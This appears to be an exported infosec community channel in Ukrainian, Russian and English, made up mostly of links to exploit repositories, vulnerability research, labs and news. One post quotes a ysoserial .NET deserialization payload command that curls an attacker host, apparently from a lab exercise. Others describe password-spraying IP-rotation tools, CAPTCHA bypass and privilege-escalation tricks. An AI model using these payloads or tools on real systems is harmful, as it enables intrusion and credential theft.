infosec_kpi_dev

01 October 2025 10:04

Сьогодні можна прийти офлайн

infosec_kpi_dev

30 September 2025 17:46

Чпокъ https://github.com/mirchr/CVE-2025-32463-sudo-chwoot

infosec_kpi_dev

29 September 2025 02:40

https://spectrum.ieee.org/unitree-robot-exploit

infosec_kpi_dev

28 September 2025 10:18

https://github.com/K2SOsint/Legendary_OSINT

infosec_kpi_dev

24 September 2025 15:30

😈 [ Aurélien Chalot @Defte_ ]

Dumping LSASS is old school. If an admin is connected on a server you are local admin on, just create a scheduled task asking for a certificate on his behalf, get the cert, get its privs. All automatized in the schtask_as module for NetExec 🥳🥳🥳

🐥 [ tweet ]

infosec_kpi_dev

24 September 2025 09:05

Bypassing Cloudflare's Turnstile CAPTCHA With thermoptic
FlareSolverr Proxy server to bypass Cloudflare protection
#infosec #cybersecurity #bugbounty @reconcore

infosec_kpi_dev

22 September 2025 11:05

https://github.com/microsoft/AI-Red-Teaming-Playground-Labs

infosec_kpi_dev

18 September 2025 21:39

Хакер это от боженьки

infosec_kpi_dev

17 September 2025 17:35

https://objective-see.org/blog/blog_0x81.html

infosec_kpi_dev

25 July 2025 18:59

:( но це не так, або я не так обяснив. В мене вийшло підписання ysoserial потім mono-devel потім скрипт на python . І вже підписи проходять наче ну нова проблема обмеження 120 символів щось таке а тільки ysoserial генерує 5кб :) я впав в ступор

infosec_kpi_dev

25 July 2025 10:43

https://specterops.io/blog/2025/07/24/escaping-the-confines-of-port-445-ntlm-relay/

infosec_kpi_dev

24 July 2025 16:04

https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html

infosec_kpi_dev

21 July 2025 23:45

Сисюрити ин екшон https://research.eye.security/sharepoint-under-siege/

infosec_kpi_dev

20 July 2025 11:43

Ниет, есть исчо https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb

infosec_kpi_dev

17 July 2025 00:33

🔑 Golden DMSA

Critical vulnerability in Windows Server 2025 allows attackers with KDS root key access to generate passwords for all dMSA/gMSA accounts forest-wide. New research reveals design flaw in ManagedPasswordId structure - only 1,024 possible combinations makes brute-force trivial.

🔗 Research:
https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/

🔗 Source:
https://github.com/Semperis/GoldenDMSA

#ad #windows #dmsa #kerberos #persistence

infosec_kpi_dev

30 September 2025 17:47

https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-linux-sudo-flaw-exploited-in-attacks/

infosec_kpi_dev

29 September 2025 13:19

#exploit
#Whitepaper
#Hardware_Security
"Breaking BMC: The Forgotten Key to the Kingdom",
NVIDIA Offensive Security Research, 2025.
]-> Ghost in the Controller: Abusing Supermicro BMC Firmware Verification
]-> Broken Trust: Fixed Supermicro BMC Bug Gains a New Life in Two New Vulnerabilities

// Analyzing Baseboard Management Controllers to Secure Data Center Infrastructure, PoCs for CVE-2024-54085, CVE-2024-10237, CVE-2025-7937, CVE-2025-6198

infosec_kpi_dev

28 September 2025 18:38

FlareProx
Simple IP Rotation & URL Redirection via Cloudflare Workers, to avoid detection and blocks. It supports all HTTP methods (GET, POST, PUT, DELETE, etc.) and provides IP masking through Cloudflare's global network. 100k requests per day are free!

FireProx
AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.

CredMaster
Launch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.

CredKing
Password spraying using AWS Lambda for IP rotation

OmniProx
A multi-cloud HTTP proxy manager that provides IP rotation and header manipulation capabilities across different cloud providers. It offers a unified interface for managing proxies on various cloud platforms.

#github #tool @reconcore

infosec_kpi_dev

27 September 2025 22:27

Хакиры везде https://www.bleepingcomputer.com/news/security/dutch-teens-arrested-for-trying-to-spy-on-europol-for-russia/

infosec_kpi_dev

24 September 2025 10:21

SQLi не только в веб https://www.rapid7.com/blog/post/cve-2025-10184-oneplus-oxygenos-telephony-provider-permission-bypass-not-fixed/

infosec_kpi_dev

22 September 2025 20:37

Ахренеть https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/

infosec_kpi_dev

22 September 2025 08:56

https://labs.cai.do/

infosec_kpi_dev

18 September 2025 12:08

Binary Exploitation 101

https://r1ru.github.io/categories/binary-exploitation-101/

infosec_kpi_dev

17 September 2025 15:06

Чи є якісь інші лаби, де можна подивитись на Cisco обладнання? Зайду кудись

infosec_kpi_dev

25 July 2025 15:10

Привіт підскажить пліз як зробити підпис, і є PasswordKey: f3d9aa53-c08d-43
PasswordIV: 5ac8083e-8ff6-43
Генерую вот таким пайлодам ..\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "curl 10.10.14.15 4444" Треба пдіписати та закодувати в base64 або може десь почитати?
Пс це десерілазаці .Net

infosec_kpi_dev

25 July 2025 09:26

Xintra - .NET Crash Dump Analysis

https://0xsultan.github.io/dfir/Xintra-Crash-Dump-Analysis/

infosec_kpi_dev

23 July 2025 23:24

https://blog.exploit.org/caster-legless/

infosec_kpi_dev

21 July 2025 23:36

CVE-2025-53770: SharePoint RCE (ToolShell)

Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit

Patched: July 20, 2025

#rce #pentest #redteam #ad #sharepoint #cve

infosec_kpi_dev

19 July 2025 18:29

https://fstrings.wtf/

infosec_kpi_dev

16 July 2025 12:42

https://thesavageteddy.github.io/featured/codegate-finals-2025/